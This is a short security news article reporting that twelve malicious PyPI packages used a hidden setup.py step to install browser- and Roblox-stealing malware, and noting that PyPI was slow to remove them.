Developers are lured into installing malicious PyPi packages

August 25, 2022
Developers Lured Installing Malicious PyPi Packages Python

Found uploaded last August 1 to the Python Package Index (PyPi) platform, hackers have recently utilised twelve malicious PyPi packages to install malware that could modify a Discord client into an info-stealing backdoor. This backdoor will then steal data from users’ Roblox accounts and web browsers.

Each PyPi package has unique names and features different capabilities, including Roblox tools, thread management, and hacking modules. However, these capabilities are only offered as lures since the packages install information-stealing malware on the developers’ computers once launched.

 

The malicious PyPi packages are still uploaded to the public repository, exposing developers to potential risks.

 

To learn more about this new malware scheme, security researchers have analysed one of the twelve PyPi packages called the ‘cyphers.’ This package has a file titled ‘setup.py,’ which carries a hidden malicious code that can install two malware executables, ‘ZYXMN[.]exe’ and ‘ZYRBX[.]exe’ from a Discord server.

All of the PyPi packages in the malicious set also behave similarly to the first one that was analysed, except for ‘hackerfilelol’ and ‘hackerfileloll’ packages that only have one malware executable each titled ‘Main[.]exe.’

The researchers also assessed the two malware executables inside the ‘setup.py’ folder. Based on their assessment, the ZYXMN[.]exe binary could harvest the victim’s data found on their web browsers, including Google Chrome, Microsoft Edge, Chromium, Firefox, and Opera. Some of the information collected by this first malware are passwords, browsing or search histories, and cookies.

On the other hand, the ZYRBX[.]exe binary focuses its capabilities on Roblox, stealing users’ account cookies, user ID, Robux balance, and the premium status of their Roblox account.

Separate researchers have also discovered two other PyPi packages that carry info-stealing malware and can modify a Discord client. In this finding, the malware steals the user’s cryptocurrency wallet, Steam, and Minecraft account credentials, while it can also scan other data such as email addresses, passwords, and financial information.

Unfortunately, the response of PyPi to the reports of malicious packages on their platform is considered slow. Most malware-carrying packages stay on the platform for many days despite being reported before they were taken down.

The time the malicious packages stay on the platform worries security experts, given that it could provide more chances for threat actors to victimise users and developers and spread info-stealing malware.

About the author